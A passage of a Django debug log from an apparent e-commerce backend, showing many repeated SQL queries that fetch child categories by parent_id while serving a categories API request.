139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:25:49,366 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:25:49,369 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:25:49,373 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:25:49,375 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:25:49,379 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:25:49,386 utils 31585 139762228295424 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:25:49,390 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:25:49,392 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:25:49,395 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:25:49,397 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:25:49,401 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:25:49,404 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:25:49,406 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:25:49,408 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:25:49,411 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:25:49,413 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:25:49,416 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:25:49,418 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:25:49,422 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:25:49,426 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:25:49,429 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:25:49] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:27:24,192 utils 31585 139762228295424 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:27:24,198 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:27:24,202 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:27:24,205 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:27:24,209 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:27:24,211 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:27:24,214 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:27:24,217 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:27:24,220 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:27:24,224 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:27:24,226 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:27:24,228 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:27:24,231 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:27:24,233 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:27:24,236 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:27:24,239 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:27:24,241 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:27:24,244 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:27:24,247 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:27:24,250 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:27:24,253 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:27:24,255 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:27:24,258 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:27:24,260 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:27:24,263 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:27:24,266 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:27:24,269 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:27:24,271 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:27:24,274 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:27:24,277 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:27:24,282 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:27:24,284 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:27:24,287 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:27:24,290 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:27:24,294 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:27:24,298 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:27:24,301 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:27:24,304 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:27:24,306 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:27:24,308 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:27:24,311 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:27:24,314 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:27:24,316 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:27:24,319 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:27:24,322 utils 31585 139762228295424 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:27:24,324 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 